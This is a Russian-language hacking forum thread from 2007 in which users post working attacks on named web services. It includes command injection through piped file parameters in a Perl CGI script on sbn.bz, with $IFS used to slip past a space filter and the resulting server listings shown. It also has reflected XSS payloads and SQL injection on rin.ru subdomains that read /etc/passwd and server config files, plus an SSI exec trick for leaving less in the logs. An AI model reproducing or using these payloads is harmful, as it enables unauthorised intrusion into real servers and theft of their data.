Уязвимость хостинга!-=sbn.bz=-

Недавно читал старый номер ][ , нашел статью FORBA о том как он ломал один хостинг. Вот и решил порыть тоже и нашел очень интересную дыру (cgi)в sbn.bz -тут можно зарегать бесплатный сайт(типа народа).

Для начала я зарегал себе акк - xxx.pbnet.ru
Затем попав в панель редактирования моего нового проекта, я увидел ссылку :Загрузка файлов на сервер: в самом низу страницы. Осмотрелся и решил попробовать загрузить файлик с компа, затем решил создать файл в панели. Ввел имя файла hackme.txt, выбрал простой редактор и нажал создать.

Вот строка сост.браузера после создания

Code:

http://sbn.bz/cgi-bin/file_viewer.pl?file=hackme.txt&editor=simple&sid=SGzNqR22M0ocEPel3bAGxebAwohxQbGk&dir=&l=1&a=edit_file

Затем ввел произвольных текст в файл blabla и сохранил.
После создания файла я решил просмотреть файл

Code:

http://sbn.bz/cgi-bin/file_viewer.pl?a=edit_file&editor=simple&sid=SGzNqR22M0ocEPel3bAGxebAwohxQbGk&dir=&file=hackme.txt&l=1

И вот заметил интересное

&file=hackme.txt&l=1

Тут меня осенило, а если вместо hackme.txt вставить пайпы с командой внутри --|id| и что вы думаете все прокатило и я увидел мои права на сервере

uid=515(www) gid=510(www) groups=510(www)

Затем по обычной схеме я решил проверить ОС, но команда uname -a не выполнилась, но я сразу понял в чем дело. Просто пробел фильтровался перловым скриптом его я заменил $IFS.

Code:

http://sbn.bz/cgi-bin/file_viewer.pl?a=edit_file&editor=simple&sid=SGzNqR22M0ocEPel3bAGxebAwohxQbGk&dir=&file=|uname$IFS-a|&l=1

Но опять неудача !
Решил вывести листинг файлов на сервере и тут все вышло

Code:

http://sbn.bz/cgi-bin/file_viewer.pl?a=edit_file&editor=simple&sid=SGzNqR22M0ocEPel3bAGxebAwohxQbGk&dir=&file=|ls$IFS-la|

А вот и файлы

Code:

total 336
drwxr-xr-x  15 root       root        4096 Apr 14 18:26 .
drwxr-xr-x   9 root       root        4096 Mar 22  2006 ..
-rw-r--r--   1 root       root          96 Dec  8  2005 .htaccess
drwxr-xr-x   4 root       root        4096 Apr 29 17:11 Modules
drwxr-xr-x   4 root       root        4096 May 16  2006 _admin
drwxr-xr-x   2 root       root        4096 Jun 29  2006 admin_
-rwxrwxrwx   1 apacheuser apacheuser  4693 Oct 11  2006 auth.pl
drwxr-xr-x   5 root       root        4096 Dec 22  2003 bn
-rwxr-xr-x   1 root       root         413 Nov 14 01:33 cenzure_includes.pl
-rwxr-xr-x   1 apacheuser apacheuser 14111 Jun 20  2006 file_viewer.pl
-rwxr-xr-x   1 apacheuser apacheuser   954 Jul 11  2005 full_img.pl
-rwxr-xr-x   1 apacheuser apacheuser  3819 May  2  2005 full_img.pl.old
-rwxr-xr-x   1 apacheuser apacheuser  2368 Jan 12  2004 hosting.pl
drwxr-xr-x   2 root       root        4096 Jun 25  2004 ibill
-rwxr-xr-x   1 apacheuser apacheuser  9481 Jun 20  2006 img_viewer.pl
-rwxr-xr-x   1 apacheuser apacheuser   229 Jan 21  2004 link.pl
-rwxr-xr-x   1 apacheuser apacheuser  3702 Jan 23  2004 lost_pwd.pl
drwxr-xr-x   2 root       root        4096 Oct  5  2006 mod
drwxr-xr-x   2 root       root        4096 Sep  4  2006 ntps
-rwxr-xr-x   1 root       root        7505 Jul 28  2006 ntps_adsfree.pl
drwxr-xr-x   2 root       root        4096 Apr 29 00:47 parser
drwxr-xr-x   3 root       root        4096 May  2  2005 paypal
-rwxr-xr-x   1 apacheuser apacheuser  3207 Dec 22  2003 redirect.pl
-rwxr-xr-x   1 apacheuser apacheuser 13254 Apr 22  2006 reg.pl
drwxr-xr-x   2 root       root        4096 Dec 23  2003 rupay
-rwxr-xr-x   1 apacheuser apacheuser  2993 Jun 20  2006 save_template.pl
-rwxr-xr-x   1 apacheuser apacheuser  6259 Dec 22  2003 show.pl
-rwxr-xr-x   1 root       root        4324 Sep  4  2006 sms_adsfree.pl
-rwxr-xr-x   1 root       root         290 May 26  2006 unsubscribe.pl
-rwxr-xr-x   1 apacheuser apacheuser  6515 Jun 20  2006 upd.pl
drwxr-xr-x   2 root       root        4096 Mar 22  2006 upload
drwxr-xr-x   2 root       root        4096 Feb 15 19:17 view
-rwxr-xr-x   1 apacheuser apacheuser 12732 Apr  9  2006 view.pl
-rwxr-xr-x   1 apacheuser apacheuser 12347 Mar  9  2006 view.pl.bak
-rwxr-xr-x   1 apacheuser apacheuser  3866 Mar 22  2006 view_templates.pl
drwxr-xr-x  12 apacheuser apacheuser  4096 Jul  3  2005 webtools

Дальше выполнил pwd -- /var/www/html/sbn/cgi-bin
Но опять натолкнулся на ж...Если вставить в пайпы запрос вида --- cd$IFS/var/www/html/sbn/cgi-bin;ls, ничего опять не выполняется, скрипт просто режит мой запрос.

; --режит. Ковырялся долго, но так и не залил не шелл не бекдор.

Нашел еще как можно выполнить команды которые не выполнялись выше например ls

Code:

http://sbn.bz/cgi-bin/file_viewer.pl?sid=NHwfwuwredtttgnVBrUU4acLimAs6TrU&file=/|ls|&dir=

К вашей сессии добавляем &file=/|ls|&dir= и все сохраняем, затем видим в директории файл с названием |ls| просмотрим его и видем листинг файлов!

А если выполнить тоже самое только ls$IFS-la|
без сохранения тоже выводит файлы только в редакторе, а не при просмотре созданного файла!

Code:

http://sbn.bz/cgi-bin/file_viewer.pl?a=edit_file&editor=simple&sid=SGzNqR22M0ocEPel3bAGxebAwohxQbGk&file=/|ls$IFS-la|&dir=

Просматривать файлы тоже можно!!!
Вот так за полчаса я зарегал себе сайт и нашел брешь, так что надо уволить прогаммиста.

Спасибо за внимание. (с) fly 2007

 

гыгыгыгы.
там ещё и пасив xss

 

сЕЙЧАС КОПАЮ RIN.RU Все их проекты.
Вот на днях XSS ЕЩЕ НАШЕЛ

http://find.rin.ru/cgi-bin/charno/pipe.pl?text=pfff%3C/a%3E%3Cimg%20src=http://forum.antichat.ru/antichat/pic/logo.gif%3E

 

Еще нашел один глюк на cash.rin.ru

ИдеМ регистрировать кошелек --- > http://cash.rin.ru/cgi-bin/reg.pl?l=1&sid=

Затем ставим ---- ПРИМЕР (любое значение после reg.pl?l=1&sid=)-------http://cash.rin.ru/cgi-bin/reg.pl?l=1&sid=HACKED

И вы увидите, что форма регистрации остается, а вот панель для ввода пароля меняется на панель якобы уже зареганного пользователя!

 

Угу, но вроде явной пользы из этого не извлечешь.

 

Ca$hed ---- ОЧЕРЕДНАЯ БАГА В Rin СЕРВИСИ

Вот и XSS опять нашел в rin ---> cash.rin.ru

Пример1:

Code:

http://cash.rin.ru/cgi-bin/sendpass.pl?l=1&email=%20%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert('Ca$hed%20by%20fLy')%3B%3C/ScRiPt%3E&a=send&l=1

Пример2:

Code:

http://cash.rin.ru/cgi-bin/sendpass.pl?l=1&email=%22+onmouseover=%22alert('Ca$hed%20by%20fLy')&a=send&l=1

А пишут , что CASH TRANSFER----надежный перевод ваших средств!!!

 

И вот еще SQL в ---socio.rin.ru

Code:

http://socio.rin.ru/cgi-bin/article.pl?idp=-11'+union+select+1,load_file('/etc/passwd')/*

Версия скулей
http://socio.rin.ru/cgi-bin/article.pl?idp=-11'+union+select+1,version()/*

Читаем конфиг
http://socio.rin.ru/cgi-bin/article.pl?idp=-11'+union+select+1,substring((load_file('/etc/httpd/conf/httpd.conf')),98,49)/*

Респект SQL-HACK за умные мысли и помощь в реализации небольшого сценария!

 

2 fly
там довольно-таки много читалок, скулей итп... про xss вообще промолчу )

 

Ты это к чему!

 

fly - а как там файлы читать?
cat file
не катит чета)

 

cat$IFSfile ---------код пробела в $IFS

 

вот смотри)
a=edit_file&editor=simple&sid=SID&dir=&file=|cat$IFShosting.pl|&l=1

так?(

 

Ты еще смотри на права и чей файл! у тЕБЯ же права там www!!!

 

а можно было залить туда файлик asd.shtml c содержанием
<!--#exec cmd="ls -lia; w;" -->
это конечно гиморойнее, но в логах меньше инфы остаётся